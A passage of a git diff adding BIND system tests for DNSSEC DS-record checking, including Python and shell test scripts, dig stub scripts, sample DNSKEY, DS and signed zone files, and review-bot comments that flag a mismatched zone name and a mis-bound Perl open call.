+ server = dns.resolver.Resolver() + server.nameservers = ["10.53.0.9"] + server.port = named_port + + parent = dns.resolver.Resolver() + parent.nameservers = ["10.53.0.2"] + parent.port = named_port + + # DS correctly published in parent. + zone_check(server, "dspublished.checkds.") + wait_for_log( + "ns9/named.run", + "zone dspublished.checkds/IN (signed): checkds: DS response from 10.53.0.2", + ) + keystate_check(parent, "dspublished.checkds.", "DSPublish") + + # DS correctly published in parent (reference to parental-agent). + zone_check(server, "reference.checkds.") + wait_for_log( + "ns9/named.run", + "zone reference.checkds/IN (signed): checkds: DS response from 10.53.0.2", + ) + keystate_check(parent, "reference.checkds.", "DSPublish") + + # DS not published in parent. + zone_check(server, "missing-dspublished.checkds.") + wait_for_log( + "ns9/named.run", + "zone missing-dspublished.checkds/IN (signed): checkds: " + "empty DS response from 10.53.0.5", + ) + keystate_check(parent, "missing-dspublished.checkds.", "!DSPublish") + + # Badly configured parent. + zone_check(server, "bad-dspublished.checkds.") + wait_for_log( + "ns9/named.run", + "zone bad-dspublished.checkds/IN (signed): checkds: " + "bad DS response from 10.53.0.6", + ) + keystate_check(parent, "bad-dspublished.checkds.", "!DSPublish") + + # TBD: DS published in parent, but bogus signature. + + # DS correctly published in all parents. + zone_check(server, "multiple-dspublished.checkds.") + wait_for_log( + "ns9/named.run", + "zone multiple-dspublished.checkds/IN (signed): checkds: " + "DS response from 10.53.0.2", + ) + wait_for_log( + "ns9/named.run", + "zone multiple-dspublished.checkds/IN (signed): checkds: " + "DS response from 10.53.0.4", + ) + keystate_check(parent, "multiple-dspublished.checkds.", "DSPublish") + + # DS published in only one of multiple parents. 
+ zone_check(server, "incomplete-dspublished.checkds.") + wait_for_log( + "ns9/named.run", + "zone incomplete-dspublished.checkds/IN (signed): checkds: " + "DS response from 10.53.0.2", + ) + wait_for_log( + "ns9/named.run", + "zone incomplete-dspublished.checkds/IN (signed): checkds: " + "DS response from 10.53.0.4", + ) + wait_for_log( + "ns9/named.run", + "zone incomplete-dspublished.checkds/IN (signed): checkds: " + "empty DS response from 10.53.0.5", + ) + keystate_check(parent, "incomplete-dspublished.checkds.", "!DSPublish") + + # One of the parents is badly configured. + zone_check(server, "bad2-dswithdrawn.checkds.") + wait_for_log( + "ns9/named.run", + "zone bad2-dspublished.checkds/IN (signed): checkds: " + "DS response from 10.53.0.2", + ) + wait_for_log( + "ns9/named.run", + "zone bad2-dspublished.checkds/IN (signed): checkds: " + "DS response from 10.53.0.4", + ) + wait_for_log( + "ns9/named.run", + "zone bad2-dspublished.checkds/IN (signed): checkds: " + "bad DS response from 10.53.0.6", + ) + keystate_check(parent, "bad2-dspublished.checkds.", "!DSPublish") + + # TBD: DS published in all parents, but one has bogus signature. + + # TBD: Check with TSIG + + +def test_checkds_dswithdrawn(named_port): + # We create resolver instances that will be used to send queries. + server = dns.resolver.Resolver() + server.nameservers = ["10.53.0.9"] + server.port = named_port + + parent = dns.resolver.Resolver() + parent.nameservers = ["10.53.0.2"] + parent.port = named_port + + # DS correctly published in single parent. + zone_check(server, "dswithdrawn.checkds.") + wait_for_log( + "ns9/named.run", + "zone dswithdrawn.checkds/IN (signed): checkds: " + "empty DS response from 10.53.0.5", + ) + keystate_check(parent, "dswithdrawn.checkds.", "DSRemoved") + + # DS not withdrawn from parent. 
+ zone_check(server, "missing-dswithdrawn.checkds.") + wait_for_log( + "ns9/named.run", + "zone missing-dswithdrawn.checkds/IN (signed): checkds: " + "DS response from 10.53.0.2", + ) + keystate_check(parent, "missing-dswithdrawn.checkds.", "!DSRemoved") + + # Badly configured parent. + zone_check(server, "bad-dswithdrawn.checkds.") + wait_for_log( + "ns9/named.run", + "zone bad-dswithdrawn.checkds/IN (signed): checkds: " + "bad DS response from 10.53.0.6", + ) + keystate_check(parent, "bad-dswithdrawn.checkds.", "!DSRemoved") + + # TBD: DS published in parent, but bogus signature. + + # DS correctly withdrawn from all parents. + zone_check(server, "multiple-dswithdrawn.checkds.") + wait_for_log( + "ns9/named.run", + "zone multiple-dswithdrawn.checkds/IN (signed): checkds: " + "empty DS response from 10.53.0.5", + ) + wait_for_log( + "ns9/named.run", + "zone multiple-dswithdrawn.checkds/IN (signed): checkds: " + "empty DS response from 10.53.0.7", + ) + keystate_check(parent, "multiple-dswithdrawn.checkds.", "DSRemoved") + + # DS withdrawn from only one of multiple parents. + zone_check(server, "incomplete-dswithdrawn.checkds.") + wait_for_log( + "ns9/named.run", + "zone incomplete-dswithdrawn.checkds/IN (signed): checkds: " + "DS response from 10.53.0.2", + ) + wait_for_log( + "ns9/named.run", + "zone incomplete-dswithdrawn.checkds/IN (signed): checkds: " + "empty DS response from 10.53.0.5", + ) + wait_for_log( + "ns9/named.run", + "zone incomplete-dswithdrawn.checkds/IN (signed): checkds: " + "empty DS response from 10.53.0.7", + ) + keystate_check(parent, "incomplete-dswithdrawn.checkds.", "!DSRemoved") + + # One of the parents is badly configured. 
+ zone_check(server, "bad2-dswithdrawn.checkds.") + wait_for_log( + "ns9/named.run", + "zone bad2-dswithdrawn.checkds/IN (signed): checkds: " + "empty DS response from 10.53.0.5", + ) + wait_for_log( + "ns9/named.run", + "zone bad2-dswithdrawn.checkds/IN (signed): checkds: " + "empty DS response from 10.53.0.7", + ) + wait_for_log( + "ns9/named.run", + "zone bad2-dswithdrawn.checkds/IN (signed): checkds: " + "bad DS response from 10.53.0.6", + ) + keystate_check(parent, "bad2-dswithdrawn.checkds.", "!DSRemoved") + + # TBD: DS withdrawn from all parents, but one has bogus signature. diff --git a/bin/tests/system/checkdstool/clean.sh b/bin/tests/system/checkdstool/clean.sh new file mode 100644 index 0000000..fb853c5 --- /dev/null +++ b/bin/tests/system/checkdstool/clean.sh @@ -0,0 +1,15 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f checkds.* +rm -f ns*/named.lock diff --git a/bin/tests/system/checkdstool/dig.bat b/bin/tests/system/checkdstool/dig.bat new file mode 100755 index 0000000..9465a46 --- /dev/null +++ b/bin/tests/system/checkdstool/dig.bat @@ -0,0 +1,32 @@ +@echo off +set ext= +set file= + +:loop +@set arg=%1 +if "%arg%" == "" goto end +if "%arg:~0,1%" == "+" goto next +if "%arg%" == "-t" goto next +if "%arg%" == "ds" goto ds +if "%arg%" == "DS" goto ds +if "%arg%" == "dnskey" goto dnskey +if "%arg%" == "DNSKEY" goto dnskey +set file=%arg% +goto next + +:ds +set ext=ds +goto next + +:dnskey +set ext=dnskey +goto next + +:next +shift +goto loop + +:end + +set name=%file%.%ext%.db +type %name% 
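Review bot: In `test_checkds_dspublished`, the "One of the parents is badly configured" case calls `zone_check(server, "bad2-dswithdrawn.checkds.")` while every log line and the `keystate_check` that follow refer to `bad2-dspublished.checkds`, so that zone is never checked for signing in this test; the call should be `zone_check(server, "bad2-dspublished.checkds.")`. In `verify_zone`, `subprocess.run(verify_cmd, capture_output=True, check=True)` raises `CalledProcessError` on a non-zero exit, which makes the `if verifier.returncode != 0:` branch unreachable and drops the captured stderr; `check=False` would let the existing error path run. In `read_statefile` the failure message says `DNSKEY` although the query type is `DS`.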
diff --git a/bin/tests/system/checkdstool/dig.pl b/bin/tests/system/checkdstool/dig.pl new file mode 100644 index 0000000..3713b2c --- /dev/null +++ b/bin/tests/system/checkdstool/dig.pl @@ -0,0 +1,41 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +my $arg; +my $ext; +my $file; + +foreach $arg (@ARGV) { + if ($arg =~ /^\+/) { + next; + } + if ($arg =~ /^-t/) { + next; + } + if ($arg =~ /^ds$/i) { + $ext = "ds"; + next; + } + if ($arg =~ /^dnskey$/i) { + $ext = "dnskey"; + next; + } + $file = $arg; + next; +} + +open F, $file . "." . $ext . ".db" || die $!; +while (<F>) { + print; +} +close F; diff --git a/bin/tests/system/checkdstool/dig.sh b/bin/tests/system/checkdstool/dig.sh new file mode 100755 index 0000000..7b3a1b2 --- /dev/null +++ b/bin/tests/system/checkdstool/dig.sh @@ -0,0 +1,24 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +while [ "$#" != 0 ]; do + case $1 in + +*) shift ;; + -t) shift ;; + DS|ds) ext=ds ; shift ;; + DNSKEY|dnskey) ext=dnskey ; shift ;; + *) file=$1 ; shift ;; + esac +done + +cat ${file}.${ext}.db 
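Review bot: In dig.pl, `open F, $file . "." . $ext . ".db" || die $!;` binds the `||` to the filename expression rather than to `open`, so `die` can never fire and a missing file is silently read as empty. The two-argument form also lets the open mode be taken from the argument text itself, which is best avoided even in a test stub that takes its file name from `@ARGV`. `open(F, '<', $file . "." . $ext . ".db") or die $!;` addresses both. `$ext` is also left undefined when no `ds` or `dnskey` argument is passed.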
diff --git a/bin/tests/system/checkdstool/missing.example.dnskey.db b/bin/tests/system/checkdstool/missing.example.dnskey.db new file mode 100644 index 0000000..e372130 --- /dev/null +++ b/bin/tests/system/checkdstool/missing.example.dnskey.db @@ -0,0 +1,3 @@ +missing.example. 3600 IN DNSKEY 257 3 5 AwEAAc6Cz10GXEh5lxA9ujTY/QarTajcUOBwwBYIeldjRsgoouK/UioY FYgxEFL0O5JK6YCRUoGzl3EgLr5GvNyhIp1PZpOpHf7o/4MVOZTGJzm/ sHWP5B+KcYjQOxJiDb433iCmRM4DpHPUUoxw0QbZglzAzl5MfKBoyZud lH59DdT/50bkBg8iVu35EzuW0SYt31k70hxHBSb2wAGWeqxEPKJ1nQiI UcrWNDeem7byrqjPN9wyZhq0XkQ9qbcYxAkRNd8Y7P0FyR1YKJMc6SWZ Ru7muvxqTHgCtJVgxVz4qndCFKdYidiDeKe2/X/z5gf7pyYl3549O8JR tWdNKqutppk= +missing.example. 3600 IN DNSKEY 257 3 5 BEAAAAOhHQDBrhQbtphgq2wQUpEQ5t4DtUHxoMVFu2hWLDMvoOMRXjG rhhCeFvAZih7yJHf8ZGfW6hd38hXG/xylYCO6Krpbdojwx8YMXLA5/kA +u50WIL8ZR1R6KTbsYVMf/Qx5RiNbPClw+vT+U8eXEJmO20jIS1ULgqy 347cBB1zMnnz/4LJpA0da9CbKj3A254T515sNIMcwsB8/2+2E63/zZrQ zBkj0BrN/9Bexjpiks3jRhZatEsXn3dTy47R09Uix5WcJt+xzqZ7+ysy LKOOedS39Z7SDmsn2eA0FKtQpwA6LXeG2w+jxmw3oA8lVUgEf/rzeC/b ByBNsO70aEFTd +missing.example. 3600 IN DNSKEY 256 3 5 BQEAAAAB2F1v2HWzCCE9vNsKfk0K8vd4EBwizNT9KO6WYXj0oxEL4eOJ aXbax/BzPFx+3qO8B8pu8E/JjkWH0oaYz4guUyTVmT5Eelg44Vb1kssy q8W27oQ+9qNiP8Jv6zdOj0uCB/N0fxfVL3371xbednFqoECfSFDZa6Hw jU1qzveSsW0= diff --git a/bin/tests/system/checkdstool/missing.example.ds.db b/bin/tests/system/checkdstool/missing.example.ds.db new file mode 100644 index 0000000..540ec0b --- /dev/null +++ b/bin/tests/system/checkdstool/missing.example.ds.db @@ -0,0 +1,2 @@ +missing.example. 3600 IN DS 12892 5 2 EF59E5C70BC4153B7DB4C11F9C36B729577DA71474E0A5C9B8875173 6E583200 +missing.example. 3600 IN DS 12892 5 1 9D4CD60491D372207FA584D2EE460CC51D7FF8A7 diff --git a/bin/tests/system/checkdstool/none.example.dnskey.db b/bin/tests/system/checkdstool/none.example.dnskey.db new file mode 100644 index 0000000..76ae905 --- /dev/null +++ b/bin/tests/system/checkdstool/none.example.dnskey.db 
@@ -0,0 +1,3 @@ +none.example. 3600 IN DNSKEY 257 3 5 AwEAAc6Cz10GXEh5lxA9ujTY/QarTajcUOBwwBYIeldjRsgoouK/UioY FYgxEFL0O5JK6YCRUoGzl3EgLr5GvNyhIp1PZpOpHf7o/4MVOZTGJzm/ sHWP5B+KcYjQOxJiDb433iCmRM4DpHPUUoxw0QbZglzAzl5MfKBoyZud lH59DdT/50bkBg8iVu35EzuW0SYt31k70hxHBSb2wAGWeqxEPKJ1nQiI UcrWNDeem7byrqjPN9wyZhq0XkQ9qbcYxAkRNd8Y7P0FyR1YKJMc6SWZ Ru7muvxqTHgCtJVgxVz4qndCFKdYidiDeKe2/X/z5gf7pyYl3549O8JR tWdNKqutppk= +none.example. 3600 IN DNSKEY 257 3 5 BEAAAAOhHQDBrhQbtphgq2wQUpEQ5t4DtUHxoMVFu2hWLDMvoOMRXjG rhhCeFvAZih7yJHf8ZGfW6hd38hXG/xylYCO6Krpbdojwx8YMXLA5/kA +u50WIL8ZR1R6KTbsYVMf/Qx5RiNbPClw+vT+U8eXEJmO20jIS1ULgqy 347cBB1zMnnz/4LJpA0da9CbKj3A254T515sNIMcwsB8/2+2E63/zZrQ zBkj0BrN/9Bexjpiks3jRhZatEsXn3dTy47R09Uix5WcJt+xzqZ7+ysy LKOOedS39Z7SDmsn2eA0FKtQpwA6LXeG2w+jxmw3oA8lVUgEf/rzeC/b ByBNsO70aEFTd +none.example. 3600 IN DNSKEY 256 3 5 BQEAAAAB2F1v2HWzCCE9vNsKfk0K8vd4EBwizNT9KO6WYXj0oxEL4eOJ aXbax/BzPFx+3qO8B8pu8E/JjkWH0oaYz4guUyTVmT5Eelg44Vb1kssy q8W27oQ+9qNiP8Jv6zdOj0uCB/N0fxfVL3371xbednFqoECfSFDZa6Hw jU1qzveSsW0= diff --git a/bin/tests/system/checkdstool/none.example.ds.db b/bin/tests/system/checkdstool/none.example.ds.db new file mode 100644 index 0000000..e69de29 --- /dev/null +++ b/bin/tests/system/checkdstool/none.example.ds.db diff --git a/bin/tests/system/checkdstool/ok.example.dnskey.db b/bin/tests/system/checkdstool/ok.example.dnskey.db new file mode 100644 index 0000000..c767c8f --- /dev/null +++ b/bin/tests/system/checkdstool/ok.example.dnskey.db 
@@ -0,0 +1,2 @@ +ok.example. 625 IN DNSKEY 257 3 5 BEAAAAOhHQDBrhQbtphgq2wQUpEQ5t4DtUHxoMVFu2hWLDMvoOMRXjGr hhCeFvAZih7yJHf8ZGfW6hd38hXG/xylYCO6Krpbdojwx8YMXLA5/kA+ u50WIL8ZR1R6KTbsYVMf/Qx5RiNbPClw+vT+U8eXEJmO20jIS1ULgqy3 47cBB1zMnnz/4LJpA0da9CbKj3A254T515sNIMcwsB8/2+2E63/zZrQz Bkj0BrN/9Bexjpiks3jRhZatEsXn3dTy47R09Uix5WcJt+xzqZ7+ysyL KOOedS39Z7SDmsn2eA0FKtQpwA6LXeG2w+jxmw3oA8lVUgEf/rzeC/bB yBNsO70aEFTd +ok.example. 625 IN DNSKEY 256 3 5 BQEAAAAB2F1v2HWzCCE9vNsKfk0K8vd4EBwizNT9KO6WYXj0oxEL4eOJ aXbax/BzPFx+3qO8B8pu8E/JjkWH0oaYz4guUyTVmT5Eelg44Vb1kssy q8W27oQ+9qNiP8Jv6zdOj0uCB/N0fxfVL3371xbednFqoECfSFDZa6Hw jU1qzveSsW0= diff --git a/bin/tests/system/checkdstool/ok.example.ds.db b/bin/tests/system/checkdstool/ok.example.ds.db new file mode 100644 index 0000000..96b159b --- /dev/null +++ b/bin/tests/system/checkdstool/ok.example.ds.db @@ -0,0 +1,2 @@ +ok.example. 3600 IN DS 12892 5 2 26584835CA80C81C91999F31CFAF2A0E89D4FF1C8FAFD0DDB31A85C7 19277C13 +ok.example. 3600 IN DS 12892 5 1 7AA4A3F416C2F2391FB7AB0D434F762CD62D1390 diff --git a/bin/tests/system/checkdstool/prep.example.db b/bin/tests/system/checkdstool/prep.example.db new file mode 100644 index 0000000..5ba5987 --- /dev/null +++ b/bin/tests/system/checkdstool/prep.example.db 
@@ -0,0 +1,121 @@ +; File written on Thu Oct 5 23:44:34 2017 +; dnssec_signzone version 9.12.0a1 +prep.example. 300 IN SOA ns1.prep.example. hostmaster.prep.example. ( + 1 ; serial + 2000 ; refresh (33 minutes 20 seconds) + 2000 ; retry (33 minutes 20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + 300 RRSIG SOA 8 2 300 ( + 20171105054434 20171006054434 19260 prep.example. + 1fX0z7Swu4gMPews/ZE8bzNg+JXNedFBDGIH + PTSfVQtVLIvRWpME+PylX7MdVMZE/PST+x4/ + mWyveyjetEOo7/7aQL236FfI0y6TxQFy7HwC + FMieqoQCUluuKOvToxg4vUp4GOdlUGbqC63h + DbX5Z37VptJXLkt4niF4Kl2iD+U9/bk7HAEU + 4zDiKroYnusGKfVB9xAWddzoHdLxhVuPi7ut + 328suPdgX0bfs7uB+y4cikhGzAmPpNMlGHju + qYG74NcFGQNutLB7ayx/m87t7mTty7jbNKm3 + QWJSPf5IR8/kmzAi8HMnapY5vUmm+hX8JOfU + UtH7i0iEsUqRbEwu5A== ) + 300 NS ns1.prep.example. + 300 RRSIG NS 8 2 300 ( + 20171105054434 20171006054434 19260 prep.example. + u5sU2cfqNqIyCLw18ZNnFw28/GyRt0EOiPYS + dygmpfMDrvDaxjiiai8zWYjnl/E3qzVH9Zku + 07lEDORZdVb0uCDe1NynjAyw4AHps85cAwVc + 8HTSbzdVZsQTELpunYFJffh24PDr9unw7KOY + jzTP6qNedJ1uM54TOr177zfmBh7N2fkAoGyV + NjvTKrlgDYGNIn8/YMgHb4sNgyfe54MYY00f + kehVxfKnRCgDsbJ0Pk6jhBMCQWvOh8jG8WyV + ElAa/eMqlxUC1idF8ydWefjsI/7lPcjSalw9 + qZw4CDCLHHZy0TOSmCYRRZuIeVXzBfDPJyi4 + 2A3iLntKFJ4AOLFMJg== ) + 3600 NSEC ns1.prep.example. NS SOA RRSIG NSEC DNSKEY + 3600 RRSIG NSEC 8 2 3600 ( + 20171105054434 20171006054434 19260 prep.example. 
+ Aed99/jdG82YAkKVWjoKOsAGtB3JnyKkCaAq + zgMrYkXU41y3KDCAmGzooGPQY7NN+WxX7FJ2 + 1nXkgljma/azgpsbi9ssneFtv7PPFClVmN+u + j+mM4MK/ZR7eJOsMqETg4PAO5VAh6c/GVmyA + RD/m6EhJVZEjPfLWbDoC4hVAgem7DP/NMjyI + GfztpDjMmyLQyv6tL+UEXSJHGp3ZEa5Z5i7X + Nl/bRTUlZs7L4rTgoqHv6LEmsXKAf9rZYq4b + eP6GF9I1Ry41MfHLc7lPUmtR38ErEsM5uGzw + trCQYEFhuRWUBxZ8OSL2EZK9rUBXZX+cwK/8 + ZP7mIfDfljkXPQcmow== ) + 3600 DNSKEY 256 3 8 ( + AwEAAfMzj6aZIgZDVcpH1pKOtq998E85+nEY + YJa0lLS8+QTCC1Efke8GLwsXT0IPTuwnOuXM + RjySirab0NuEr69T8KP/43YxcRdmCg89mjjN + szoVPPstC9xBKVOc0pRMDF7sfsTrSye3RY7+ + Z6uZEH5FOAkz2hNbJJHOn4HpNUhLPJGRauhf + 0evamwUmQ/mlhkVW5q4WmqPCDMNY3K6XtkEm + cvm8n9ZCXC9Z5AX6KpynujzLdKyxpdGqUk6r + lavp9ILPpRKoTZDX+2q1pDgP5cDndwtgNSvU + DBQZoD0psS2cyB3PHo+dPwwpEyM//ZSKsH9m + e85Ti0413TOWFyFd/jUOUA8= + ) ; ZSK; alg = RSASHA256 ; key id = 19260 + 3600 DNSKEY 257 3 8 ( + AwEAAbV8X06Qvk350aZ6eZ1d7WbT1H/Y0Sv7 + qAdbk5fbYIKpMvZ8D9xqoTHgD0z0uCgWWIcm + /xyKBfmax76oLwMBpR/kdtuJz0irgFITnJCH + pEfR9AJ/Mfm7NyMglq+/39I03E1/LXvpXQLG + tg+Mo/2CUE5sbG31jmPNK/2J8RMESkIi87fW + azZU/oyUEtECE5PGbdyw+4PacAsXNjnwl30T + aatL277wX4pt+IUPdE6EIph3t+dxXJ7OpHgW + 8g+YSHLlCImLVapdg3oD/cs6ncaBq9z7la5Y + dHNw2QAIAvQ11EsonrkonPqO6zNVZAVdT2VB + X5YzGAoCFUvbCvlnl2a7SxM= + ) ; KSK; alg = RSASHA256 ; key id = 65482 + 3600 RRSIG DNSKEY 8 2 3600 ( + 20171105054434 20171006054434 19260 prep.example. + pPw81pJ3PeF+tqEswTul9N8Qsl9JKgK4v8SV + lPfP0pnlMBMbtMFFkx5ZmhQg3Z3U8SdE64Bt + C5St3qItyyKdTQ0Rbm9mfV6twxDB8lVry8F7 + Pv7gJmmcWzBcbLGcrXIrVNSZhigkemQXTElj + P8y1j7kaNFWBWbDMn7KesiZ9BiC6sqvuKa3R + wSofjwXTESspWZP0NtXr5ymaBIMR9UtNj5Wh + jm1+tg6BxNBKxhCHlSC0ltPS/qq9J1ZUmtJz + sj/EAFfPVJVuEveebMvi1oDWPTgajO9+EHl4 + ELrgnQHCgaybMzbpd/A5+Tr1hQkv48I8Mb0/ + 8LJ2/6xrvJm64yRteg== ) + 3600 RRSIG DNSKEY 8 2 3600 ( + 20171105054434 20171006054434 65482 prep.example. 
+ WeIWiC9SnBe2+UocVjpap62O8Rz+iljwJiu9 + VlGUwct3Vydq4/4FVAKdPklXV5cYbBLhO2MB + 3R4toX8RNU/0Ny8DnugQzLKvVfg0xoyU/UAJ + k4aWa/vPivSLGouLQPiNp71bdXN4LB/2xmzu + cPYXzS9ePpwCOp/9JLoNjBSMQkfjfWAcaNtj + 1DKDmHHL1sPMizninxSJLQOAKb+JwUAjAkOM + O1JqwkB12/IZuzxN5hly+uNsbFFxPzQkcnJ4 + 5bhzxuh5D/JRXW0nF5aO4aR+9X+lSUpDJQZ1 + 5fOt1cybZCn/ag68RA92zrnisdbrggJGS003 + wn/VKbLVfFj3eQrfNA== ) +ns1.prep.example. 300 IN A 1.1.1.1 + 300 RRSIG A 8 3 300 ( + 20171105054434 20171006054434 19260 prep.example. + QUyDyJVk3JGEq+VTZtY3firzsRqOA0LUm3Tf + /fnemQBeOlMda2ErA7DqYVriIGfM8jph416E + YX8SKAZXGEAlsEbC9cWBVyc5TYH6tZ43sV51 + 55kGTiUY92NnrH10Q+m2SLAEEaKCA/cgBwOR + tN2Wb1meHgiLbGYN2LbANfDQzoEk4AYAgT6r + wDKVVg/V9Ed7JnCnBQc9MN9+LQ3h4NBGUiEY + mr7HX2w+yzqcGFNLI1aFPe2IwFt120QPLyyl + cZgc6FUBX4YCnWoCb0aFyyOT76AQkKF5YBRn + gAv6S8q1pZ/0B5w4gjaLEGlts3LG0bxZ1GJd + gCQMEhgYgyXUchTtZA== ) + 3600 NSEC prep.example. A RRSIG NSEC + 3600 RRSIG NSEC 8 3 3600 ( + 20171105054434 20171006054434 19260 prep.example. + rDWN40u1a3DSzWOrS+4YR2XOxaem0BAQ/glN + QkXNDew1WsZo3fe0IHIhDKlJ/5MJAfAHq8Xs + A5UGUw2efoNAN/0LuWsI/9IPm4dwQOXiTCly + uxugXf5islPYyvn1Z14ay/7/2P3W6HZknXzo + lZFpwqfFZQCxz7c/1aH+2ntAMeqx8LHuewSr + Rz/sLsSiCcZQ6NMWnZdoC5SGy4CTcIIPPS8z + 9dQ6QYTC5iq4MKRfyJUyvODyU9be4e6jbo5b + mjRcov4ttbImhD5jrLAZIfjO6DSazGNVFf/x + 6rjxjrc8SISPkt2xYwcOlYch9OZuoH86wcZu + 3Don6yAnLDYDrZylAA== ) diff --git a/bin/tests/system/checkdstool/prep.example.ds.db b/bin/tests/system/checkdstool/prep.example.ds.db new file mode 100644 index 0000000..dddcad6 --- /dev/null +++ b/bin/tests/system/checkdstool/prep.example.ds.db @@ -0,0 +1,2 @@ +prep.example. IN DS 65482 8 1 F3673708FBADDEC3EB55933E2E393ACE85EAC2BB +prep.example. IN DS 65482 8 2 51A7C97AAC42803DA515D1CAFEE28031A5018F6345F12F4B6C1B6D20 02B59820 diff --git a/bin/tests/system/checkdstool/tests.sh b/bin/tests/system/checkdstool/tests.sh new file mode 100644 index 0000000..4248b11 --- /dev/null +++ b/bin/tests/system/checkdstool/tests.sh 
@@ -0,0 +1,117 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if [ "$CYGWIN" ]; then + DIG=".\dig.bat" + WINDSFROMKEY=`cygpath -w $DSFROMKEY` + CHECKDS="$CHECKDS -a sha1 -a sha256 -d $DIG -D $WINDSFROMKEY" +else + DIG="./dig.sh" + CHECKDS="$CHECKDS -a sha1 -a sha256 -d $DIG -D $DSFROMKEY" +fi +chmod +x $DIG + +status=0 +n=1 + +echo_i "checking for correct DS, looking up key via 'dig' ($n)" +ret=0 +$CHECKDS ok.example > checkds.out.$n 2>&1 || ret=1 +grep 'SHA-1' checkds.out.$n > /dev/null 2>&1 || ret=1 +grep 'SHA-256' checkds.out.$n > /dev/null 2>&1 || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking for correct DS, obtaining key from file ($n)" +ret=0 +$CHECKDS -f ok.example.dnskey.db ok.example > checkds.out.$n 2>&1 || ret=1 +grep 'SHA-1' checkds.out.$n > /dev/null 2>&1 || ret=1 +grep 'SHA-256' checkds.out.$n > /dev/null 2>&1 || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking for incorrect DS, looking up key via 'dig' ($n)" +ret=0 +$CHECKDS wrong.example > checkds.out.$n 2>&1 || ret=1 +grep 'SHA-1' checkds.out.$n > /dev/null 2>&1 || ret=1 +grep 'SHA-256' checkds.out.$n > /dev/null 2>&1 || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking for incorrect DS, obtaining key from file ($n)" +ret=0 +$CHECKDS -f wrong.example.dnskey.db wrong.example > checkds.out.$n 2>&1 || ret=1 +grep 'SHA-1' checkds.out.$n > /dev/null 2>&1 || ret=1 +grep 
'SHA-256' checkds.out.$n > /dev/null 2>&1 || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking for partially missing DS, looking up key via 'dig' ($n)" +ret=0 +$CHECKDS missing.example > checkds.out.$n 2>&1 && ret=1 +grep 'SHA-1.*found' checkds.out.$n > /dev/null 2>&1 || ret=1 +grep 'SHA-256.*found' checkds.out.$n > /dev/null 2>&1 || ret=1 +grep 'SHA-1.*missing' checkds.out.$n > /dev/null 2>&1 || ret=1 +grep 'SHA-256.*missing' checkds.out.$n > /dev/null 2>&1 || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking for partially missing DS, obtaining key from file ($n)" +ret=0 +$CHECKDS -f missing.example.dnskey.db missing.example > checkds.out.$n 2>&1 && ret=1 +grep 'SHA-1.*found' checkds.out.$n > /dev/null 2>&1 || ret=1 +grep 'SHA-256.*found' checkds.out.$n > /dev/null 2>&1 || ret=1 +grep 'SHA-1.*missing' checkds.out.$n > /dev/null 2>&1 || ret=1 +grep 'SHA-256.*missing' checkds.out.$n > /dev/null 2>&1 || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking for entirely missing DS, looking up key via 'dig' ($n)" +ret=0 +$CHECKDS none.example > checkds.out.$n 2>&1 && ret=1 +grep 'SHA-1.*found' checkds.out.$n > /dev/null 2>&1 && ret=1 +grep 'SHA-256.*found' checkds.out.$n > /dev/null 2>&1 && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking for entirely missing DS, obtaining key from file ($n)" +ret=0 +$CHECKDS -f none.example.dnskey.db none.example > checkds.out.$n 2>&1 && ret=1 +grep 'SHA-1.*found' checkds.out.$n > /dev/null 2>&1 && ret=1 +grep 'SHA-256.*found' checkds.out.$n > /dev/null 2>&1 && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking with prepared dsset file ($n)" +ret=0 +$CHECKDS -f prep.example.db -s prep.example.ds.db 
